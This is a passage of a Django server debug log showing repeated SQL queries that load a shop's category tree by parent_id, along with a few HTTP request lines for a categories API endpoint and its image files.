"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 09:26:59,041 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 09:26:59,043 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 09:26:59,047 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 09:26:59,051 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 09:26:59,054 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 09:26:59,056 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 09:26:59,058 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 09:26:59,061 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 09:26:59,063 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 09:26:59,069 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 09:26:59,073 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 09:26:59,077 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 09:26:59,080 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 09:26:59,083 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 09:26:59,088 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 09:26:59,091 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 09:26:59,093 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 09:26:59,095 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 09:26:59,099 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 09:26:59,103 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 09:26:59,106 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 09:26:59,110 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 09:26:59,112 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 09:26:59,114 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 09:26:59,116 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 09:26:59,119 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 09:26:59,121 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 09:26:59,123 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 09:26:59,126 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 09:26:59,129 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 09:26:59] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [18/Dec/2019 09:26:59] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [18/Dec/2019 09:26:59] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-18 09:27:11,845 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 09:27:11,853 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:27:11,856 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 09:27:11,859 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 09:27:11,862 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 09:27:11,867 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 09:27:11,869 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 09:27:11,872 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 09:27:11,876 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 09:27:11,879 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 09:27:11,882 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 09:27:11,885 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 09:27:11,889 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 09:27:11,893 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 09:27:11,897 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 09:27:11,899 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 09:27:11,901 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 09:27:11,904 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 09:27:11,906 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 09:27:11,910 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 09:27:11,912 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 09:27:11,914 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 09:27:11,916 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 09:27:11,918 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 09:27:11,921 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 09:27:11,924 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 09:27:11,926 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 09:27:11,929 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 09:27:11,931 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 09:27:11,933 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 09:27:11,937 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 09:27:11,939 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 09:27:11,941 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 09:27:11,944 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 09:27:11,946 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 09:27:11,950 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 09:27:11,952 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY 